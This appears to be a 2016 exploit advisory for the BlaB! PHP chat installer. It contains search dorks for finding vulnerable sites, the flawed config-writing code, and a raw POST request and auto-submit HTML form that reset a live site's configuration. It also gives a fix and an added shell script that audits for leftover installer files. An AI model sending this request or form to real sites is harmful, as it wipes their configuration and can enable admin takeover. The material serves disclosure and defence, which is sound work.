#@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@#
Title --> BlaB! - Configuration Deletion
Author --> bRpsd
Skype ID --> VEGNOX
Date --> 2/19/2016

Blab Official / Download Freeware --> http://hot-things.net/blab-lite-ajax-chat
Vulnerable versions --> All Versions So Far.
Tested Version --> 8.1 - Latest

Description :
"BlaB! is a web based chat written in PHP, using AJAX as a transport system and MySQL, SQLite or PostgreSQL as a database storage. The project started back in 2002 as a self-refreshing page called Simple Chat that can still be found on the Internet. There have been more than 200000 downloads ever since and about 12000 active installations, some of which transferring 10000 messages a day."
#@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@#

|| Dorks ||

"Powered by BlaB! 8.1"

"Powered by BlaB!"

intext:Powered by BlaB!
-------------------------------------------------------------------------------------------------------------------------------

Affected Files : 
/install/index.php
/install/s2.inc


Code :
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
if(isset($_POST['sssalt'])){$config_dist=str_replace('salt=\'\'','salt=\''.$_POST['sssalt'].'\'',$config_dist);}
if(isset($_POST['dbtype'])){$config_dist=str_replace('dbss[\'type\']=\'\'','dbss[\'type\']=\''.$_POST['dbtype'].'\'',$config_dist);}
if(isset($_POST['dbsqlt'])){$config_dist=str_replace('dbss[\'sqlt\']=\'\'','dbss[\'sqlt\']=\''.$_POST['dbsqlt'].'\'',$config_dist);}
if(isset($_POST['dbhost'])){$config_dist=str_replace('dbss[\'host\']=\'\'','dbss[\'host\']=\''.$_POST['dbhost'].'\'',$config_dist);}
if(isset($_POST['dbname'])){$config_dist=str_replace('dbss[\'name\']=\'\'','dbss[\'name\']=\''.$_POST['dbname'].'\'',$config_dist);}
if(isset($_POST['dbuser'])){$config_dist=str_replace('dbss[\'user\']=\'\'','dbss[\'user\']=\''.$_POST['dbuser'].'\'',$config_dist);}
if(isset($_POST['dbpass'])){$config_dist=str_replace('dbss[\'pass\']=\'\'','dbss[\'pass\']=\''.$_POST['dbpass'].'\'',$config_dist);}
if(isset($_POST['prefix'])){$config_dist=str_replace('dbss[\'prfx\']=\'\'','dbss[\'prfx\']=\''.$_POST['prefix'].'\'',$config_dist);}
if($_POST['dbtype']=='mysql'){$config_dist=str_replace('?>',"error_reporting(1);\r\n?>",$config_dist);}

if(is_writable($config_file)){
$fd=fopen($config_file,'w');fwrite($fd,$config_dist);fclose($fd);$config_ok=1;}
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

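By sending a simple POST request with the variable (step) set to the value (2), the host will attempt to re-install the CMS with an empty configuration, and the website will no longer work or function. No other POST field is required: each isset() check above is skipped, and the contents of $config_dist are written over $config_file as long as that file is writable. A successful attack might lead to overwriting the database [re-installation of the script] and taking over the administration panel.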

\\ POST REQUEST //

##########################################################################################################################
localhost/blab81/install/index.php

Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

step=2
##########################################################################################################################

// HTML PROOF \\

<form action="http://localhost/blab81/install/index.php" method="POST">
<input type="hidden" name="step" value="2" />
<input type="submit" value="GO!" />
</form>



** SOLUTION ** 
- Remove the entire /install/ folder and you're good.
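
Added example (not part of the original advisory or of BlaB!'s code): a shell audit that checks a webroot for the installer files listed under Affected Files and scans an access log for POST requests that reached the installer. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a BlaB! deployment for the leftover installer and
# for POST requests that reached it. File paths come from the advisory;
# the access log format (Apache/nginx "combined") is an assumption.

# Print each installer file from the advisory that still exists under $1.
# Returns 0 if any is present (host still exposed), 1 if none is found.
installer_present() {
    webroot=$1
    found=1
    for f in install/index.php install/s2.inc; do
        if [ -e "$webroot/$f" ]; then
            printf '%s\n' "$webroot/$f"
            found=0
        fi
    done
    return $found
}

# Read combined-format access log lines on stdin and print
# "client timestamp status" for every POST to .../install/index.php.
# The request body (step=2) is not logged, so any POST to the installer
# after deployment is treated as worth reviewing.
installer_posts() {
    awk '{
        method = $6; sub(/^"/, "", method)
        path = $7;   sub(/\?.*$/, "", path)
        if (method == "POST" && path ~ /\/install\/index\.php$/) {
            ts = $4; sub(/^\[/, "", ts)
            print $1, ts, $9
        }
    }'
}

# Constructed sample log lines (documentation addresses, not real traffic).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [19/Feb/2016:10:01:02 +0000] "GET /blab81/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Feb/2016:10:05:44 +0000] "POST /blab81/install/index.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
192.0.2.10 - - [19/Feb/2016:10:06:00 +0000] "GET /blab81/install/index.php HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
EOF
}

# Demo on the constructed log; on a real host use: installer_posts < access.log
sample_log | installer_posts
```

A hit from installer_posts dated after the original installation means the configuration file and database should be checked against a known-good backup.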

# siph0n [2016-02-22]